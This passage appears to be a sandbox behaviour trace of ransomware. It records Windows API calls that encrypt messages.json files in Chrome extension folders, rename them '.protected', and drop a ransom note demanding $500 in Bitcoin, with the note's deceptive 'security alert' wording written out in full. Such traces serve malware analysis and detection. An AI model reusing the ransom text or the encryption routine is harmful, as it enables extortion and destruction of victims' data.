wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.400] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.400] lstrlenA (lpString="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") returned 684 [0083.400] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.400] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.401] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0083.401] CloseHandle (hObject=0x164) returned 1 [0083.401] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.401] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0083.401] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0083.401] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0083.401] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0083.401] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0083.401] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs") returned 150 [0083.401] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0083.401] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0083.401] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\*") returned 152 [0083.401] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.401] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.401] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.401] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.401] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.401] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.401] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\.") returned 152 [0083.401] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.401] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.402] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.402] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.402] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.402] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.402] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.402] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\..") returned 153 [0083.402] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.402] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.402] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.402] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.402] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.402] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.402] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.402] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.402] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json") returned 164 [0083.402] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.402] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.402] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.402] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.402] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.403] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json") returned 164 [0083.403] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.403] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json") returned 164 [0083.403] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.403] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json") 
returned 164 [0083.403] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.403] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.405] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.405] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.405] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.406] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.406] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.406] CloseHandle (hObject=0x168) returned 1 [0083.406] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.protected") returned 174 [0083.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.protected")) returned 1 [0083.407] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.407] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.407] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\RESTORE_FILES.txt") returned 168 [0083.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.408] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.408] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.409] lstrlenA (lpString="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") returned 684 [0083.409] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0083.409] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.409] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.409] CloseHandle (hObject=0x164) returned 1 [0083.409] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.409] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0083.409] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0083.409] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0083.409] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0083.409] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0083.409] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da") returned 150 [0083.409] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0083.409] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0083.409] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\*") returned 152 [0083.409] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0083.410] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.410] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.410] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.410] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.410] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.410] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\.") returned 152 [0083.410] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.410] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.410] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.410] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.410] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.410] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.410] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.410] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\..") returned 153 [0083.410] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.410] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.410] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.410] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.410] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.410] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0083.410] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.410] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.410] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json") returned 164 [0083.410] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.410] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.410] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.410] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.412] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json") returned 164 [0083.412] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.412] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json") returned 164 [0083.412] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.412] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json") returned 164 [0083.412] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.412] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.416] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.416] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.416] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.416] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.417] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.417] CloseHandle (hObject=0x168) returned 1 [0083.417] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.protected") returned 174 [0083.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.protected")) returned 1 [0083.418] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.418] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.418] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\RESTORE_FILES.txt") returned 168 [0083.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.418] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.418] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.419] lstrlenA (lpString="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") returned 684 [0083.419] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.419] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.419] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.419] CloseHandle (hObject=0x164) returned 1 [0083.420] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.420] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0083.420] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0083.420] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0083.420] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0083.420] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0083.420] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de") returned 150 [0083.420] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0083.420] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0083.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 